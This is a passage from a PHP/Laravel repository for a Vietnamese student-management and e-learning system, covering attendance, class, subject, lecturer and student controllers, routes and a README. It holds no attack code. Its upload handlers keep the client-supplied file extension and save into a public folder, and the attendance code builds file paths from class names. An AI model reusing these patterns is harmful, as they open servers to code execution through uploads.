"length_bytes": 2467, "license_type": "no_license", "max_line_length": 141, "num_lines": 81, "path": "/app/Http/Controllers/DiemDanhController.php", "repo_name": "HieuDepZaii/he-thong-quan-ly-sinh-vien-tich-hop-elearing", "src_encoding": "UTF-8", "text": "<?php\n\nnamespace App\\Http\\Controllers;\n\nuse App\\Models\\LopHoc;\nuse App\\Models\\SinhVien;\nuse App\\Models\\SubjectClass;\nuse Illuminate\\Http\\Request;\n\nclass DiemDanhController extends Controller\n{\n public function kTraDiemDanh($masv, $dssv)\n {\n\n// print_r($dssv);\n foreach ($dssv as $item) {\n $sinhvien = explode(\"-\", $item);\n if ($masv == $sinhvien[1]) {\n $kiemtra = 0;\n break;\n } else {\n $kiemtra = 1;\n }\n }\n return $kiemtra;\n }\n\n public function ghiThongTinDiemDanh($malop)\n {\n $file = \"Cap/diemdanhsv.txt\";\n $handle = fopen($file, 'r');\n// fclose($handle);\n $masv = fread($handle, filesize($file));\n $sinhvien = SinhVien::where('id', (int)$masv)->first();\n $lophoc = SubjectClass::where('id', (int)$malop)->first();\n $fileName = 'dsdiemdanh/' . $lophoc->ten_lop . ' ' . date(\"d-m-Y\") . '.txt';\n $file = fopen($fileName, 'a');\n// if ($this->kTraDiemDanh($masv, $fileName) == 1) {\n fwrite($file,(string)$sinhvien->id . '-' . (string)$sinhvien->name . '-' .(string)$lophoc->ten_lop.'-'. date(\"d/m/Y-h:i:sa\") . 
\"\\n\");\n fclose($file);\n fclose($handle);\n// }\n return view('thongTinDiemDanh', ['sinhvien' => $sinhvien]);\n\n }\n\n public function createFormDiemDanh($malop)\n {\n $lophoc=LopHoc::where('id',$malop)->first();\n return view('diemdanh2',['lophoc' => $lophoc]);\n }\n\n public function xemKQDiemDanh($malop)\n {\n $lophoc = SubjectClass::where('id', (int)$malop)->first();\n $fileName = 'dsdiemdanh/' . $lophoc->ten_lop . ' ' . date(\"d-m-Y\") . '.txt';\n $dssv = [];\n $mssv=[];\n $handle = fopen($fileName, 'r');\n $content = fread($handle, filesize($fileName));\n fclose($handle);\n $dssv = explode(\"\\n\", $content);\n $dssv_diem_danh=[];\n // $n=(int)count($dssv);\n // print_r($dssv);\n foreach($dssv as $item){\n $sinhvien=explode(\"-\",$item);\n if(!in_array($sinhvien[0],$mssv)){\n array_push($mssv,$sinhvien[0]);\n array_push($dssv_diem_danh,$item);\n }\n }\n // print_r($dssv_diem_danh);\n // echo $dssv[0];\n // $sinhvien=explode(\"-\",$dssv[3]);\n // echo $sinhvien[1];\n return view('ketQuaDiemDanh',['dssv'=>$dssv_diem_danh]);\n\n }\n\n}\n" }, { "alpha_fraction": 0.4926871955394745, "alphanum_fraction": 0.49617987871170044, "avg_line_length": 32.93333435058594, "blob_id": "74485cdfffdb511101ba934158486314b66650d9", "content_id": "3be929c4d39863a5a444c13ef94fe968067370f6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 4650, "license_type": "no_license", "max_line_length": 115, "num_lines": 135, "path": "/app/Http/Controllers/LopHocController.php", "repo_name": "HieuDepZaii/he-thong-quan-ly-sinh-vien-tich-hop-elearing", "src_encoding": "UTF-8", "text": "<?php\n\nnamespace App\\Http\\Controllers;\n\nuse App\\Models\\LopHoc;\nuse App\\Models\\MonHoc;\nuse App\\Models\\SinhVienLopHoc;\nuse Illuminate\\Http\\Request;\nuse Illuminate\\Support\\Facades\\DB;\n\nclass LopHocController extends Controller\n{\n //\n public function __construct()\n {\n $this->middleware('auth');\n }\n\n public function ViewDangKiMoLop()\n {\n $mon_hoc = MonHoc::all();\n return view('giang-vien.dangKiMoLop', ['mon_hoc' => $mon_hoc]);\n }\n\n public function kiemTraTenLop($tenlop)\n {\n $DSTenLop = DB::select('select * from lop_hoc where ten_lop = ?', [$tenlop]);\n if ($DSTenLop) {\n return false;\n } else {\n return true;\n }\n }\n public function danhSachLopHoc($magv)\n {\n $dsLopHoc = DB::table('lop_hoc')\n ->where('magv', '=', $magv)\n ->get();\n return view('giang-vien.danhSachLopHoc', ['dsLopHoc' => $dsLopHoc]);\n }\n public function danhSachLopHocHocVien($masv)\n {\n $dsLopHoc = DB::table('dssv_lop_hoc')\n ->join('lop_hoc', 'lop_hoc.id', '=', 'dssv_lop_hoc.malop')\n ->select('dssv_lop_hoc.*', 'lop_hoc.ten_lop')\n ->where('dssv_lop_hoc.masv', '=', $masv)\n ->get();\n return view('hoc-vien.dsLopHoc', ['dsLopHoc' => $dsLopHoc]);\n }\n\n public function saveLopHoc(Request $request)\n {\n try {\n $ten_lop = \\request('ten_lop');\n $lophoc = new LopHoc();\n if ($this->kiemTraTenLop($ten_lop)) {\n $lophoc->ten_lop = \\request('ten_lop');\n $lophoc->magv = \\request('magv');\n $lophoc->monhoc_id = \\request('monhoc_id');\n $time1 = explode(\"/\", \\request('ngay_bat_dau'));\n $ngay_bat_dau = $time1[2] . '-' . $time1[1] . '-' . $time1[0];\n $lophoc->ngay_bat_dau = $ngay_bat_dau;\n $time2 = explode(\"/\", \\request('ngay_ket_thuc'));\n $ngay_ket_thuc = $time2[2] . '-' . $time2[1] . '-' . 
$time2[0];\n $lophoc->ngay_ket_thuc = $ngay_ket_thuc;\n $lophoc->save();\n $msg = \"thêm thành công\";\n } else {\n $msg = 'tên lớp bị trùng';\n }\n } catch (\\Exception $e) {\n $msg = \"có lỗi xảy ra vui lòng thử lại\";\n }\n return redirect('giangvien/dang-ki-mo-lop')->with('msg', $msg);\n }\n public function viewChiTietLopHoc($malop)\n {\n $lopHoc = DB::table('lop_hoc')\n ->join('mon_hoc', 'lop_hoc.monhoc_id', '=', 'mon_hoc.id')\n ->where('lop_hoc.id', '=', $malop)\n ->select('lop_hoc.*', 'mon_hoc.mamh', 'mon_hoc.tenmh', 'mon_hoc.mota')\n ->first();\n\n return view('chiTietLopHoc', ['lopHoc' => $lopHoc]);\n }\n public function viewDangKiLopHoc()\n {\n $dsLopHoc = LopHoc::all();\n return view('hoc-vien.dangKiLopHoc', ['dsLopHoc' => $dsLopHoc]);\n }\n public function dangKiLopHoc(Request $request)\n {\n\n $masv = $request->masv;\n $malop = $request->malop;\n if ($this->kiemTraDKLopHoc($masv, $malop)) {\n $hocVienDaDK = new SinhVienLopHoc();\n $hocVienDaDK->masv = $request->masv;\n $hocVienDaDK->malop = $request->malop;\n $hocVienDaDK->save();\n $msg = \"đăng kí lớp thành công\";\n } else {\n $msg = \"Bạn đã đăng kí lớp này rồi\";\n }\n\n return redirect(route('hocvien.viewDangKiLopHoc'))->with('msg', $msg);\n }\n public function kiemTraDKLopHoc($masv, $malop)\n {\n // $result=DB::table('dssv_lop_hoc')\n // ->where('masv','=',$masv)\n // ->where('malop','=',$malop)\n // ->get();\n // lưu ý: không dùng được BD:table vì nó trả về kiểu dữ liệu k phải mảng nên k thể xét đc result rỗng hay k\n $result = DB::select('select * from dssv_lop_hoc where masv = ? and malop = ?', [$masv, $malop]);\n print_r($result);\n if ($result) {\n return 0;\n } else {\n return 1;\n }\n }\n public function dshvLopHoc($malop)\n {\n $lopHoc = DB::table('lop_hoc')\n ->where('id', $malop)\n ->first();\n $dshv = DB::table('dssv_lop_hoc')\n ->join('users', 'users.id', '=', 'dssv_lop_hoc.masv')\n ->select('dssv_lop_hoc.*', 'users.name')\n ->where('malop', $malop)\n ->get();\n return view('giang-vien.danhSachHocVien', ['dshv' => $dshv, 'lopHoc' => $lopHoc]);\n }\n}\n" }, { "alpha_fraction": 0.5052631497383118, "alphanum_fraction": 0.5280701518058777, "avg_line_length": 26.14285659790039, "blob_id": "2da4a605e4fa21e2c98766cbaba79a0d5965f7d3", "content_id": "d95f450a6cecdea8aba59ff711b3ec4683bb6592", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 573, "license_type": "no_license", "max_line_length": 86, "num_lines": 21, "path": "/public/demotest.php", "repo_name": "HieuDepZaii/he-thong-quan-ly-sinh-vien-tich-hop-elearing", "src_encoding": "UTF-8", "text": "<?php\n function kTraDiemDanh($masv, $filename)\n{\n $kiemtra = false;\n $handle = fopen($filename, 'r');\n $content = fread($handle, filesize($filename));\n $dssv = explode(\"\\n\", $content);\n// print_r($dssv);\n foreach ($dssv as $item) {\n $sinhvien = explode(\"-\", $item);\n if ($masv == $sinhvien[1]) {\n $kiemtra = false;\n break;\n } else {\n $kiemtra = true;\n }\n }\n fclose($handle);\n return $kiemtra;\n}\necho kTraDiemDanh(2,'dsdiemdanh/công nghệ pm cs403A 30-12-2020.txt') ? 
'true':'false';\n" }, { "alpha_fraction": 0.7735471129417419, "alphanum_fraction": 0.7735471129417419, "avg_line_length": 248.5, "blob_id": "9519582121562ac153a3defa3716aa850b0cc416", "content_id": "e049f7eafd94e1839dab6ce1ec26b3d8691006bd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 632, "license_type": "no_license", "max_line_length": 450, "num_lines": 2, "path": "/README.md", "repo_name": "HieuDepZaii/he-thong-quan-ly-sinh-vien-tich-hop-elearing", "src_encoding": "UTF-8", "text": "# Student management system with integrated e-learning\nA student and lecturer management system built with PHP, the Laravel framework, and MySQL, like the ones schools use, with e-learning integrated so that students can download materials, join online classes, and chat. It also has a handy face-scanning feature (using Google's Teachable Machine face recognition technology) to stop other people from downloading materials on a student's behalf, disrupting classes, or registering for credits for someone else.\n" }, { "alpha_fraction": 0.7288153171539307, "alphanum_fraction": 0.7288153171539307, "avg_line_length": 72.8923110961914, "blob_id": "e613b67d39cbe9b6cf9089a4d2b1be1a0f3e9b20", "content_id": "9952e264a3b5a63283fa20abc6772c6a85683af7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 9639, "license_type": "no_license", "max_line_length": 164, "num_lines": 130, "path": "/routes/web.php", "repo_name": "HieuDepZaii/he-thong-quan-ly-sinh-vien-tich-hop-elearing", "src_encoding": "UTF-8", "text": "<?php\n\nuse App\\Http\\Controllers\\DiemDanhController;\nuse App\\Http\\Controllers\\DocumentController;\nuse App\\Http\\Controllers\\InfomationController;\nuse App\\Http\\Controllers\\LopHocController;\nuse App\\Http\\Controllers\\MonHocController;\nuse App\\Http\\Controllers\\NguoiDungController;\nuse App\\Http\\Controllers\\ZoomController;\nuse App\\Models\\ThongBao;\nuse Illuminate\\Support\\Facades\\Route;\nuse Illuminate\\Support\\Facades\\Auth;\n\n/*\n|--------------------------------------------------------------------------\n| Web Routes\n|--------------------------------------------------------------------------\n|\n| Here is where you can register web routes for your application. These\n| routes are loaded by the RouteServiceProvider within a group which\n| contains the \"web\" middleware group. 
Now create something great!\n|\n*/\n\n\n\nRoute::get('/', function () {\n $infomation=ThongBao::all();\n return view('trangchu',['infomation' => $infomation]);\n})->name('trangchu');\n//Admin route\nRoute::get('/admin/home', [\\App\\Http\\Controllers\\AdminController::class, 'index'])->name('admin.home')->middleware('admin');\n//admin-Giang Vien\nRoute::get('admin/show-giang-vien', [\\App\\Http\\Controllers\\GiangVienController::class, 'showGiangVien'])->name('admin.showGiangVien');\nRoute::post('admin/save-giang-vien', [\\App\\Http\\Controllers\\GiangVienController::class, 'saveGiangVien'])->name('admin.saveGiangVien');\nRoute::get('admin/them-giang-vien', [\\App\\Http\\Controllers\\GiangVienController::class, 'createGiangVien'])->name('admin.createGiangVien');\nRoute::get('/admin/sua-giang-vien/{id}', [\\App\\Http\\Controllers\\GiangVienController::class, 'suaGiangVien'])->name('admin.suaGiangVien');\nRoute::post('/admin/edit-giang-vien/{id}', [\\App\\Http\\Controllers\\GiangVienController::class, 'editGiangVien'])->name('admin.editGiangVien');\nRoute::delete('/admin/xoa-giang-vien/{id}', [\\App\\Http\\Controllers\\GiangVienController::class, 'xoaGiangVien'])->name('admin.xoaGiangVien');\n//admin Sinh Vien\nRoute::get('admin/show-sinh-vien', [\\App\\Http\\Controllers\\SinhVienController::class, 'showSinhVien'])->name('admin.showSinhVien');\nRoute::post('admin/save-sinh-vien', [\\App\\Http\\Controllers\\SinhVienController::class, 'saveSinhVien'])->name('admin.saveSinhVien');\nRoute::get('admin/them-sinh-vien', [\\App\\Http\\Controllers\\SinhVienController::class, 'createSinhVien'])->name('admin.createSinhVien');\nRoute::get('/admin/sua-sinh-vien/{id}', [\\App\\Http\\Controllers\\SinhVienController::class, 'suaSinhVien'])->name('admin.suaSinhVien');\nRoute::post('/admin/edit-sinh-vien/{id}', [\\App\\Http\\Controllers\\SinhVienController::class, 'editSinhVien'])->name('admin.editSinhVien');\nRoute::delete('/admin/xoa-sinh-vien/{id}', [\\App\\Http\\Controllers\\SinhVienController::class, 'xoaSinhVien'])->name('admin.xoaSinhVien');\n//admin Lớp Học\nRoute::get('admin/show-lop-hoc', [\\App\\Http\\Controllers\\SubjectClassController::class, 'showLopHoc'])->name('admin.showLopHoc');\nRoute::post('admin/save-lop-hoc', [\\App\\Http\\Controllers\\SubjectClassController::class, 'saveLopHoc'])->name('admin.saveLopHoc');\nRoute::get('admin/them-lop-hoc', [\\App\\Http\\Controllers\\SubjectClassController::class, 'createLopHoc'])->name('admin.createLopHoc');\nRoute::get('/admin/sua-lop-hoc/{id}', [\\App\\Http\\Controllers\\SubjectClassController::class, 'suaLopHoc'])->name('admin.suaLopHoc');\nRoute::post('/admin/edit-lop-hoc/{id}', [\\App\\Http\\Controllers\\SubjectClassController::class, 'editLopHoc'])->name('admin.editLopHoc');\nRoute::delete('/admin/xoa-lop-hoc/{id}', [\\App\\Http\\Controllers\\SubjectClassController::class, 'xoaLopHoc'])->name('admin.xoaLopHoc');\n//admin giảng dạy\nRoute::get('admin/show-giang-day', [\\App\\Http\\Controllers\\GiangDayController::class, 'showGiangDay'])->name('admin.showGiangDay');\nRoute::post('admin/save-giang-day', [\\App\\Http\\Controllers\\GiangDayController::class, 'saveGiangDay'])->name('admin.saveGiangDay');\nRoute::delete('/admin/xoa-giang-day/{id}', [\\App\\Http\\Controllers\\GiangDayController::class, 'xoaGiangDay'])->name('admin.xoaGiangDay');\n\n//user chỉnh sửa thông tin cá nhân\nRoute::get('user/sua-thong-tin/{id}', [\\App\\Http\\Controllers\\NguoiDungController::class, 
'createFormSuaThongTin'])->name('user.InfomationEditForm');\nRoute::post('user/edit-thong-tin/{id}', [\\App\\Http\\Controllers\\NguoiDungController::class, 'suaThongTinCaNhan'])->name('user.editThongTin');\nRoute::get('users/xem-thong-tin-nguoi-dung/{id}', [NguoiDungController::class,'xemThongTinNguoiDung'])->name('user.xemThongTin');\n// Route::get('user/xem-ds-lop/{id}', [\\App\\Http\\Controllers\\NguoiDungController::class, 'xemDSLopHoc'])->name('user.xemDsLop');\n// Route::get('user/xem-chi-tiet-lop-hoc/{malop}', [\\App\\Http\\Controllers\\NguoiDungController::class, 'xemChiTietlop'])->name('user.xemChiTietLop');\n// Route::get('user/form-cap-nhap-diem-cc/{malop}/{masv}', [\\App\\Http\\Controllers\\NguoiDungController::class, 'formCapNhapDiemCC'])->name('user.formCapNhapDiemCC');\n// Route::post('user/cap-nhap-diemcc/{malop}/{masv}',[\\App\\Http\\Controllers\\NguoiDungController::class,'capNhapDiemCC'])->name('user.capNhapDiemcc');\n\n\n//Lecturers (giang vien)\nRoute::get('giangvien/dang-ki-mo-lop', [LopHocController::class,'ViewDangKiMoLop'])->name('giangvien.viewDangKiMoLop')->middleware('giang-vien');\nRoute::post('giangvien/save-lop-hoc', [LopHocController::class, 'saveLopHoc'])->name('giangvien.saveLopHoc')->middleware('giang-vien');\nRoute::get('giangvien/xem-ds-lop-hoc/{magv}',[LopHocController::class,'danhSachLopHoc'])->name('giangvien.dsLopHoc')->middleware('giang-vien');\nRoute::get('giangvien/ds-hoc-vien/{malop}',[LopHocController::class,'dshvLopHoc'])->name('giangvien.xemDSHocVien')->middleware('giang-vien');\nRoute::get('giangvien/tao-zoom-room/{malop}',[ZoomController::class,'createZoomCLassForm'])->name('giangvien.taoZoomClass')->middleware('giang-vien');\nRoute::post('giangvien/tao-zoom-room',[ZoomController::class,'createZoomClass'])->name('giangvien.saveZoomClass')->middleware('giang-vien');\nRoute::get('giangvien/sua-zoom-room/{malop}',[ZoomController::class,'editZoomClassForm'])->name('giangvien.editZoomClassForm')->middleware('giang-vien');\nRoute::post('giangvien/edit-zoom-room',[ZoomController::class,'editZoomClass'])->name('giangvien.editZoomClass')->middleware('giang-vien');\nRoute::delete('giangvien/delete-zoom-room/{id}',[ZoomController::class,'deleteZoomClass'] )->name('giangvien.deleteZoomClass')->middleware('giang-vien');\n//view class details\nRoute::get('user/chi-tiet-lop-hoc/{malop}/{userid}',[LopHocController::class,'viewChiTietLopHoc'])->name('user.chiTietLopHoc');\n\n//online class\nRoute::get('user/online-class/{malop}',[ZoomController::class,'indexOnlineClass'])->name('user.viewOnlineClass');\n\n\n// subjects (mon hoc)\nRoute::get('admin/xem-ds-mon-hoc',[MonHocController::class,'index'])->name('admin.xemDSMonHoc');\nRoute::get('admin/them-mon-hoc',[MonHocController::class,'createMonHocView'])->name('admin.formThemMonHoc');\nRoute::post('admin/them-mon-hoc',[MonHocController::class,'themMonHoc'])->name('admin.themMonHoc');\nRoute::get('admin/update-mon-hoc/{mamh}',[MonHocController::class,'updateMonHocView'])->name('admin.formupdateMonHoc');\nRoute::post('admin/update-mon-hoc',[MonHocController::class,'update'])->name('admin.updateMonHoc');\nRoute::delete('admin/delete-mon-hoc/{id}',[MonHocController::class,'delete'])->name('admin.deleteMonHoc');\n//Students (hoc vien)\nRoute::get('hocvien/dang-ki-lop-hoc',[LopHocController::class,'ViewDangKiLopHoc'])->name('hocvien.viewDangKiLopHoc');\nRoute::post('hocvien/save-dang-ki-lop-hoc',[LopHocController::class,'dangKiLopHoc'])->name('hocvien.saveDangKiLopHoc');\nRoute::get('hocvien/ds-lop-hoc/{masv}',[LopHocController::class,'danhSachLopHocHocVien'])->name('hocvien.xemDsLopHoc');\n\n//Announcements (thong bao)\nRoute::get('admin/xem-ds-thong-bao',[InfomationController::class,'index'])->name('admin.xemDSThongBao');\nRoute::get('admin/them-thong-bao',[InfomationController::class,'createView'])->name('admin.viewAddThongBao');\nRoute::post('admin/them-thong-bao',[InfomationController::class,'create'])->name('admin.themThongBao');\nRoute::delete('admin/xoa-thong-bao/{id}',[InfomationController::class,'delete'])->name('admin.xoaThongBao');\n//attendance (diem danh)\n// Route::get('/xu-ly-diem-danh', [\\App\\Http\\Controllers\\DiemDanhController::class, 'diemDanh'])->name('diemdanh');\n// Route::get('ghi-thong-tin-diem-danh/{malop}', [\\App\\Http\\Controllers\\DiemDanhController::class, 'ghiThongTinDiemDanh'])->name('ghiThongTinDiemDanh');\n// Route::get('xem-ds-diem-danh/{malop}', [\\App\\Http\\Controllers\\DiemDanhController::class, 'xemKQDiemDanh'])->name('xemKQDiemDanh');\n// Route::get('huy-diem-danh', function () {\n// return view('huyDiemDanh');\n// })->name('huyDiemDanh');\nRoute::get('/diemdanh/{malop}',[DiemDanhController::class,'createFormDiemDanh'])->name('hocvien.diemdanh');\n\nRoute::get('/ket-qua-diem-danh/{id}', function ($id){\n return view('ketQuaDiemDanh',['userid'=>$id]);\n});\n\n\n\nAuth::routes();\nRoute::get('/home', [App\\Http\\Controllers\\HomeController::class, 'index'])->name('home');\nRoute::group(['middleware' => ['auth', 'admin']], function () {\n Route::get('admin-view', [\\App\\Http\\Controllers\\HomeController::class, 'adminView'])->name('admin.view');\n});\n\n\n// File upload & download\n// Route::resource('documents', 'DocumentController');\nRoute::get('documents/{uuid}/download', [DocumentController::class,'download'])->name('documents.download');\nRoute::get('documents/index/{malop}',[DocumentController::class,'index'])->name('documents.index');\nRoute::get('documents/create/{malop}',[DocumentController::class,'create'])->name('documents.create');\nRoute::post('documents/store',[DocumentController::class,'store'])->name('documents.store');\n" }, { "alpha_fraction": 0.4962962865829468, "alphanum_fraction": 0.49845677614212036, "avg_line_length": 31.399999618530273, "blob_id": "9dc8b5be1f2d943e15909719ae40ce8891609fab", "content_id": "68d9ee98c3b1b251031e713df6c1cd8eeca8ecba", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 3278, "license_type": "no_license", "max_line_length": 104, "num_lines": 100, "path": "/app/Http/Controllers/SinhVienController.php", "repo_name": "HieuDepZaii/he-thong-quan-ly-sinh-vien-tich-hop-elearing", "src_encoding": "UTF-8", "text": "<?php\n\nnamespace App\\Http\\Controllers;\n\nuse App\\Models\\SinhVien;\nuse Illuminate\\Http\\Request;\n\nclass SinhVienController extends Controller\n{\n public function __construct()\n {\n $this->middleware('admin');\n }\n\n public function showSinhVien()\n {\n $sinhvien = SinhVien::all();\n return view('admin.showSinhVien', ['sinhvien' => $sinhvien]);\n }\n\n public function createSinhVien()\n {\n return view('admin.themSinhVien');\n }\n\n public function saveSinhVien(Request $request)\n {\n try {\n $sinhVien = new SinhVien();\n $sinhVien->name = \\request('name');\n $date = 
\\request('ngay');\n $month = \\request('thang');\n $year = \\request('nam');\n $ngaysinh = $year . '-' . $month . '-' . $date;\n $sinhVien->ngay_sinh = $ngaysinh;\n $sinhVien->gioi_tinh=\\request('gioi_tinh');\n //upload profile picture\n $get_image=$request->file('anh');\n if($get_image){\n $new_image=\\request('name').'-'.rand(0,99).'.'.$get_image->getClientOriginalExtension();\n $get_image->move('upload/sinhVien',$new_image);\n $sinhVien->anh=\"upload/sinhVien/$new_image\";\n }\n $sinhVien->save();\n $msg = \"thêm thành công\";\n } catch (\\Exception $e) {\n $msg = \"có lỗi xảy ra vui lòng thử lại\";\n }\n return redirect('admin/them-sinh-vien')->with('msg', $msg);\n }\n\n public function suaSinhVien($id)\n {\n $sinhvien = SinhVien::where('id', $id)->first();\n\n return view('admin.suaSinhVien', ['sinhvien' => $sinhvien]);\n }\n\n public function editSinhVien(Request $request,$id)\n {\n try {\n $sinhVien = SinhVien::where('id', $id)->first();\n $sinhVien->name = \\request('name');\n $date = \\request('ngay');\n $month = \\request('thang');\n $year = \\request('nam');\n $ngaysinh = $year . '-' . $month . '-' . $date;\n $sinhVien->ngay_sinh = $ngaysinh;\n $sinhVien->gioi_tinh=\\request('gioi_tinh');\n $get_image=$request->file('anh');\n if($get_image){\n $new_image=\\request('name').'-'.rand(0,99).'.'.$get_image->getClientOriginalExtension();\n $get_image->move('upload/sinhVien',$new_image);\n $sinhVien->anh=\"upload/sinhVien/$new_image\";\n }else{\n if(!$sinhVien->anh){\n $sinhVien->anh='';\n }\n }\n// save the result\n $sinhVien->save();\n $msg_edit = \"chỉnh sửa thành công\";\n } catch (\\Exception $e) {\n $msg_edit = \"chỉnh sửa thất bại\";\n }\n return redirect('admin/sua-sinh-vien/' . $id)->with('msg_edit', $msg_edit);\n }\n\n public function xoaSinhVien($id)\n {\n // try {\n $sinhvien = SinhVien::findOrFail($id);\n $sinhvien->delete();\n $msg_delete = \"đã xóa 1 item\";\n // } catch (\\Exception $e) {\n // $msg_delete = \"có lỗi vui lòng thử lại\";\n // }\n return redirect('/admin/show-sinh-vien')->with('msg_delete', $msg_delete);\n }\n}\n" }, { "alpha_fraction": 0.4987320303916931, "alphanum_fraction": 0.4991546869277954, "avg_line_length": 27.506023406982422, "blob_id": "6f97f4111e6045e8d52fef92d316ea3a05b45fe7", "content_id": "4b5cca5be570194053a186533f1503fe79cada30", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 2401, "license_type": "no_license", "max_line_length": 93, "num_lines": 83, "path": "/app/Http/Controllers/MonHocController.php", "repo_name": "HieuDepZaii/he-thong-quan-ly-sinh-vien-tich-hop-elearing", "src_encoding": "UTF-8", "text": "<?php\n\nnamespace App\\Http\\Controllers;\n\nuse App\\Models\\MonHoc;\nuse Illuminate\\Http\\Request;\nuse Illuminate\\Support\\Facades\\DB;\n\nclass MonHocController extends Controller\n{\n //\n public function __construct()\n {\n $this->middleware('admin');\n }\n public function index()\n {\n $monhoc = MonHoc::all();\n return view('monhoc.index', ['monhoc' => $monhoc]);\n }\n public function createMonHocView()\n {\n return view('monhoc.create');\n }\n public function themMonHoc(Request $request)\n {\n try {\n if ($this->kiemtraMaMH($request->mamh)) {\n $monhoc = new MonHoc();\n $monhoc->mamh = $request->mamh;\n $monhoc->tenmh = $request->tenmh;\n $monhoc->mota = $request->mota;\n $monhoc->save();\n $msg = \"thêm môn học thành công\";\n } else {\n $msg = \"mã môn học bị trùng\";\n }\n } catch (\\Exception $e) {\n $msg = \"something error\";\n }\n return 
redirect(route('admin.formThemMonHoc'))->with('msg', $msg);\n }\n public function kiemtraMaMH($mamh)\n {\n $monhoc = DB::select('select * from mon_hoc where mamh = ?', [$mamh]);\n if ($monhoc) {\n return false;\n } else {\n return true;\n }\n }\n public function updateMonHocView($mamh)\n {\n $monhoc = MonHoc::find($mamh);\n return view('monhoc.update', ['monhoc' => $monhoc]);\n }\n public function update(Request $request)\n {\n try {\n $id = $request->id;\n $monhoc = MonHoc::find($id);\n $monhoc->mamh = $request->mamh;\n $monhoc->tenmh = $request->tenmh;\n $monhoc->mota = $request->mota;\n $monhoc->save();\n $msg = 'update thành công';\n } catch (\\Exception $e) {\n $msg='có lỗi, vui lòng thử lại';\n }\n return redirect(route('admin.formupdateMonHoc', ['mamh' => $id]))->with('msg', $msg);\n }\n public function delete($id)\n {\n try{\n $monhoc = MonHoc::findOrFail($id);\n $monhoc->delete();\n $msg = \"đã xóa 1 môn\";\n }catch(\\Exception $e){\n $msg=\"có lỗi, vui lòng thử lại\";\n }\n return redirect(route('admin.xemDSMonHoc'))->with('msg', $msg);\n }\n}\n" }, { "alpha_fraction": 0.6273291707038879, "alphanum_fraction": 0.6273291707038879, "avg_line_length": 27.41176414489746, "blob_id": "7899b003a4cedc2bdad4e1897427f066f1f334ac", "content_id": "af3ec920852bff7b4a47ef72a8dca4159976d927", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 969, "license_type": "no_license", "max_line_length": 75, "num_lines": 34, "path": "/app/Http/Controllers/InfomationController.php", "repo_name": "HieuDepZaii/he-thong-quan-ly-sinh-vien-tich-hop-elearing", "src_encoding": "UTF-8", "text": "<?php\n\nnamespace App\\Http\\Controllers;\n\nuse App\\Models\\ThongBao;\nuse Illuminate\\Http\\Request;\n\nclass InfomationController extends Controller\n{\n public function __construct(){\n $this->middleware('admin');\n }\n public function index(){\n $infomation=ThongBao::all();\n return view('thong-bao.index',['information'=>$infomation]);\n }\n public function createView(){\n return view('thong-bao.themThongBao');\n }\n public function create(Request $request){\n $infomation =new ThongBao();\n $infomation->content=$request->content;\n $infomation->user_id=$request->user_id;\n $infomation->save();\n $msg=\"thêm thành công\";\n return redirect(route('admin.viewAddThongBao'))->with('msg', $msg);\n }\n public function delete($id){\n $infomation=ThongBao::findOrFail($id);\n $infomation->delete();\n return redirect(route('admin.xemDSThongBao'));\n }\n}\n" }, { "alpha_fraction": 0.511600911617279, "alphanum_fraction": 0.5136311054229736, "avg_line_length": 32.47572708129883, "blob_id": "6f3351cf619b2f29b9fc52cab14b4f0c08206d10", "content_id": "59718c2e7e48d65399786bc932bc123496e8e82a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 3486, "license_type": "no_license", "max_line_length": 104, "num_lines": 103, "path": "/app/Http/Controllers/GiangVienController.php", "repo_name": "HieuDepZaii/he-thong-quan-ly-sinh-vien-tich-hop-elearing", "src_encoding": "UTF-8", "text": "<?php\n\nnamespace App\\Http\\Controllers;\n\nuse App\\Models\\GiangVien;\nuse Illuminate\\Http\\Request;\nuse Illuminate\\Support\\Facades\\Hash;\n\nclass GiangVienController extends Controller\n{\n public function __construct()\n {\n $this->middleware('admin');\n }\n\n public function showGiangVien()\n {\n $giangvien = GiangVien::all();\n return view('admin.showGiangVien', ['giangvien' => $giangvien]);\n }\n\n public function 
createGiangVien()\n {\n return view('admin.themGiangVien');\n }\n\n public function saveGiangVien(Request $request)\n {\n try {\n $giangVien = new GiangVien;\n $giangVien->name = \\request('name');\n $giangVien->email = \\request('email');\n $date = \\request('ngay');\n $month = \\request('thang');\n $year = \\request('nam');\n $ngaysinh = $year . '-' . $month . '-' . $date;\n $giangVien->ngay_sinh = $ngaysinh;\n $giangVien->password=Hash::make(\\request('password'));\n //upload profile picture\n $get_image=$request->file('anh');\n if($get_image){\n $new_image=\\request('name').'-'.rand(0,99).'.'.$get_image->getClientOriginalExtension();\n $get_image->move('upload/giangVien',$new_image);\n $giangVien->anh=\"upload/giangVien/$new_image\";\n }\n $giangVien->save();\n $msg = \"thêm thành công\";\n } catch (\\Exception $e) {\n $msg = \"có lỗi xảy ra vui lòng thử lại\";\n }\n return redirect('admin/them-giang-vien')->with('msg', $msg);\n }\n\n public function suaGiangVien($id)\n {\n $giangvien = GiangVien::where('id', $id)->first();\n\n return view('admin.suaGiangVien', ['giangvien' => $giangvien]);\n }\n\n public function editGiangVien(Request $request,$id)\n {\n try {\n $giangVien = GiangVien::where('id', $id)->first();\n $giangVien->name = \\request('name');\n $giangVien->email = \\request('email');\n $date = \\request('ngay');\n $month = \\request('thang');\n $year = \\request('nam');\n $ngaysinh = $year . '-' . $month . '-' . $date;\n $giangVien->ngay_sinh = $ngaysinh;\n $giangVien->password=Hash::make(\\request('password'));\n $get_image=$request->file('anh');\n if($get_image){\n $new_image=\\request('name').'-'.rand(0,99).'.'.$get_image->getClientOriginalExtension();\n $get_image->move('upload/giangVien',$new_image);\n $giangVien->anh=\"upload/giangVien/$new_image\";\n }else{\n if(!$giangVien->anh){\n $giangVien->anh='';\n }\n }\n// save the result\n $giangVien->save();\n $msg_edit = \"chỉnh sửa thành công\";\n } catch (\\Exception $e) {\n $msg_edit = \"chỉnh sửa thất bại\";\n }\n return redirect('admin/sua-giang-vien/' . 